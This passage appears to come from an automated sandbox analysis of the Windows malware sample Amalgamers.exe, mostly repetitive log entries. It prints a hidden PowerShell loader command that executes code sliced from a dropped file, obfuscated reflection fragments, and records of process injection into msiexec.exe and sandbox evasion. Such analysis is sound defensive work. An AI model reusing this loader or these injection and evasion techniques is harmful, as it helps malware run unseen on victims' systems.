            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: Amalgamers.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Kreditforeningers $Pietetslst $Unbeholding), (Afgasning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Blighia = [AppDomain]::CurrentDomain.GetAssemblies(
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Subfix)), $Layloc).DefineDynamicModule($Woodhole, $false).DefineType($Festforestillingens, $Carnies, [System.MulticastDelegate])$Psych
            Source: C:\Users\user\Desktop\Amalgamers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
            Source: C:\Users\user\Desktop\Amalgamers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\Amalgamers.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6001Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3718Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2056Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\SysWOW64\msiexec.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
            Source: C:\Users\user\Desktop\Amalgamers.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: msiexec.exe, 00000006.00000002.2878965092.0000000008573000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Amalgamers.exeAPI call chain: ExitProcess graph end nodegraph_0-3259
            Source: C:\Users\user\Desktop\Amalgamers.exeAPI call chain: ExitProcess graph end nodegraph_0-3252
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_02CC92F0 LdrInitializeThunk,6_2_02CC92F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3F60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
